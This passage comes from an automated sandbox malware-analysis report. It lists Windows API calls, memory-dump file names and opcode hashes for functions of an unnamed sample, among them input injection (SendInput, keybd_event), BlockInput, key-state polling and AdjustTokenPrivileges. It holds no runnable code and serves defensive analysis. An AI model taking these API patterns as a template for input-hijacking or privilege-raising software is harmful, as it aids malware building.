                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: cc807aa50792616107eb458f685f14c2b61b7f6e6e9ff1415159846d034e3f1d
                                                                                                                        • Instruction ID: 086bd840e393ba368b26c53720f4e5f83205187fa6a4a3ddcc681353e0311443
                                                                                                                        • Opcode Fuzzy Hash: cc807aa50792616107eb458f685f14c2b61b7f6e6e9ff1415159846d034e3f1d
                                                                                                                        • Instruction Fuzzy Hash: 3FF08C3510432DBBDB21AFA4CC49FEA7B6DEF493A1F008156B91AE7191D630DA44CBB0
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DD4B89
                                                                                                                        • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00DD4B9C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3536248340-0
                                                                                                                        • Opcode ID: bd9693ebb7b2af5f7d3e4c1a8b7866237074123588be4fe878953afb7d2f3eae
                                                                                                                        • Instruction ID: e310c207e8bd8c138b431061ebaed1d82dab90f90d5745c509c51fa30d7abbb3
                                                                                                                        • Opcode Fuzzy Hash: bd9693ebb7b2af5f7d3e4c1a8b7866237074123588be4fe878953afb7d2f3eae
                                                                                                                        • Instruction Fuzzy Hash: F8F0177090424EAFEB058FA5C806BBE7BB4AF04305F04C40AF965A6291D7B9C6169FA4
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DCB9EC), ref: 00DCB8C5
                                                                                                                        • CloseHandle.KERNEL32(?,?,00DCB9EC), ref: 00DCB8D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: 9cec32251777c6b1ccc4bc93535924b47c8572924642429f9da83d76ef42e408
                                                                                                                        • Instruction ID: 844f454b290ab6a94b51b3893d903bfe2f090c1dc406c5810a1e7e85f25761ec
                                                                                                                        • Opcode Fuzzy Hash: 9cec32251777c6b1ccc4bc93535924b47c8572924642429f9da83d76ef42e408
                                                                                                                        • Instruction Fuzzy Hash: 00E0B672004611EEE7262B65EC09DB77BEAEF08361B14C92AF49681470DB62AC94DB20
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00DFF59C
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00E0F3AD,?,?,?,?), ref: 00DFF5C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2065330234-0
                                                                                                                        • Opcode ID: 45c29d5133247b029e25372056c1ee5762b9f6b4831ad2ab08778aeb8f70e360
                                                                                                                        • Instruction ID: 07c008c5c6c90e98c57bd99e0db6d16abd5de267bccd03877778aa5130ecd692
                                                                                                                        • Opcode Fuzzy Hash: 45c29d5133247b029e25372056c1ee5762b9f6b4831ad2ab08778aeb8f70e360
                                                                                                                        • Instruction Fuzzy Hash: 8AE08C7010822CBBEB151F1ADC0AFB93B29EB00B50F10C526FA56D80E0D7B088A0D660
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00D9125D,00DB7A43,00D90F35,?,?,00000001), ref: 00DB8E41
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00DB8E4A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 093b99e2cc243aa328c12945504d1ead541291356e756502cc6187e63a96719e
                                                                                                                        • Instruction ID: b09f3bc44e96d257954cb48ebaae01606172c2c4e7bcf630895ac96145962edd
                                                                                                                        • Opcode Fuzzy Hash: 093b99e2cc243aa328c12945504d1ead541291356e756502cc6187e63a96719e
                                                                                                                        • Instruction Fuzzy Hash: ABB09271048A08AFEA002FA2EC09BC83F68EB08A72F008010F62D54060CB6354548A92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3db7f7cda19f7d2482e19caa47c3fbc9bd553125fa3875f51d328540f4361416
                                                                                                                        • Instruction ID: 24b3239597c6332d37fadf7cc900f7bc45f4a93327d47130d4e78e1b96146bcd
                                                                                                                        • Opcode Fuzzy Hash: 3db7f7cda19f7d2482e19caa47c3fbc9bd553125fa3875f51d328540f4361416
                                                                                                                        • Instruction Fuzzy Hash: EEB11221D2AF514DD323963A8D31336B65CAFBB2D5F91D71BFC2A70D62EB2181874180
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00E00352
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2065330234-0
                                                                                                                        • Opcode ID: ef021f1ff196e3c7308b0c8cf17cf7e950577a10168e568549d0bb02e297acf7
                                                                                                                        • Instruction ID: 4047a2a35da57c0f3d44362528206bb4ce788b5bd3b8a33432399bfe823afc29
                                                                                                                        • Opcode Fuzzy Hash: ef021f1ff196e3c7308b0c8cf17cf7e950577a10168e568549d0bb02e297acf7
                                                                                                                        • Instruction Fuzzy Hash: 00113A31204219BFFB2A1B2CCC45FB93714EB41B20F248315FA227A1E2CAA48D80D275
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166
                                                                                                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00DFE7AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallLongProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4084987330-0
                                                                                                                        • Opcode ID: 2ed21a3523cf3b38c1b34b8821cc9772e60a35197a70fd16de253bfe081bad1b
                                                                                                                        • Instruction ID: b2bb3ed231c593422775bfde7044106a64defffd696ab4bc54c1d6d4d69e9add
                                                                                                                        • Opcode Fuzzy Hash: 2ed21a3523cf3b38c1b34b8821cc9772e60a35197a70fd16de253bfe081bad1b
                                                                                                                        • Instruction Fuzzy Hash: AFF04F3110410CFFCF19AF55EC40DB93BA6EB04321B058554FE659A2B1C732DD60EB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                          • Part of subcall function 00DAB736: GetCursorPos.USER32(000000FF), ref: 00DAB749
                                                                                                                          • Part of subcall function 00DAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00DAB766
                                                                                                                          • Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000001), ref: 00DAB78B
                                                                                                                          • Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000002), ref: 00DAB799
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00E0F417,?,?,?,?,?,00000001,?), ref: 00DFEA9C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2356834413-0
                                                                                                                        • Opcode ID: d11f291d2a0d86ac934706074c7dd7451d22148587acbb96ab4f88bce085d01c
                                                                                                                        • Instruction ID: cb873362d6f705160606833f07a1e4e04e716cbbf0308bcd4d1bdc0918941cde
                                                                                                                        • Opcode Fuzzy Hash: d11f291d2a0d86ac934706074c7dd7451d22148587acbb96ab4f88bce085d01c
                                                                                                                        • Instruction Fuzzy Hash: F4F0A731100329ABDB186F19CC06EBE3F61FB01755F044015F9162A1A1D776D865DBF1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00DAAF40,?,?,?,?,?), ref: 00DAB83B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2065330234-0
                                                                                                                        • Opcode ID: 41b8b097b266fcd4defd3780c70419ab455b45c4317dfc89100785d5b2d0cb27
                                                                                                                        • Instruction ID: 85168889115b9796e82aebe18c31d6f74aae3d3670400de608ad20a0819a890c
                                                                                                                        • Opcode Fuzzy Hash: 41b8b097b266fcd4defd3780c70419ab455b45c4317dfc89100785d5b2d0cb27
                                                                                                                        • Instruction Fuzzy Hash: F8F0BE30200209DFDB2C9F19DC91A393BA2FB01361F108629F8625B2A1D731C860DB60
                                                                                                                        APIs
                                                                                                                        • BlockInput.USER32(00000001), ref: 00DE7057
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockInput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3456056419-0
                                                                                                                        • Opcode ID: cb9af97ca3d1af1c110153bee8d9f25beabd9c649b4a012d69c5c6ff6fe9da37
                                                                                                                        • Instruction ID: 7611a532977f40c36af5c53944176fb0e3e1c9e7a51b0190237d69e6d5ea47a8
                                                                                                                        • Opcode Fuzzy Hash: cb9af97ca3d1af1c110153bee8d9f25beabd9c649b4a012d69c5c6ff6fe9da37
                                                                                                                        • Instruction Fuzzy Hash: 83E04F363142049FC710EFAAD808E96F7ECEF98760F00C42AFA45D7251DAB0E8049BB0
                                                                                                                        APIs
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00DFF41A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3239928679-0
                                                                                                                        • Opcode ID: ba11d518ff2c94501f9e3c4befd4395c1fbce0f233063a3f686638d26c29826a
                                                                                                                        • Instruction ID: 1731020b1061ede6abf53c639ee6f9f4457ab1f0a24fc009e0232a4cb027fd07
                                                                                                                        • Opcode Fuzzy Hash: ba11d518ff2c94501f9e3c4befd4395c1fbce0f233063a3f686638d26c29826a
                                                                                                                        • Instruction Fuzzy Hash: 92F0ED31200388AFCB20DF18CC05FD63BA5FB05320F088458FA21672E1CB706820D760
                                                                                                                        APIs
                                                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00DD7DF8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: mouse_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2434400541-0
                                                                                                                        • Opcode ID: c457ec12f0881b9294ce59ee16a4f9f19792684e8fc2302a89ad92bdf55d2581
                                                                                                                        • Instruction ID: b257809fa66817d65cbd2ba71fe6604e11b8fe4df060a711f98df66ef2fe2988
                                                                                                                        • Opcode Fuzzy Hash: c457ec12f0881b9294ce59ee16a4f9f19792684e8fc2302a89ad92bdf55d2581
                                                                                                                        • Instruction Fuzzy Hash: 41D05EA016C206F9FD180B609C2FF7A010BEB00780FE882CBB481C62C1FC94A8085034
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00DAACC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2065330234-0
                                                                                                                        • Opcode ID: faff117ead7fd5be4f0432ca4339834ec09952ae78990b9f150b6f19cd42e2f5
                                                                                                                        • Instruction ID: aa1afc135e7e6ff0cc292b072d8b25b8ee1681c12e3b7f86123e91ad2c77cfdf
                                                                                                                        • Opcode Fuzzy Hash: faff117ead7fd5be4f0432ca4339834ec09952ae78990b9f150b6f19cd42e2f5
                                                                                                                        • Instruction Fuzzy Hash: C2E0EC35144208FFCF19AF95DC52F683B26FB49354F108458FA155B2A1CB33A526EB61
                                                                                                                        APIs
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00E0F3D4,?,?,?,?,?,?), ref: 00DFF450
                                                                                                                          • Part of subcall function 00DFE13E: _memset.LIBCMT ref: 00DFE14D
                                                                                                                          • Part of subcall function 00DFE13E: _memset.LIBCMT ref: 00DFE15C
                                                                                                                          • Part of subcall function 00DFE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E53EE0,00E53F24), ref: 00DFE18B
                                                                                                                          • Part of subcall function 00DFE13E: CloseHandle.KERNEL32 ref: 00DFE19D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
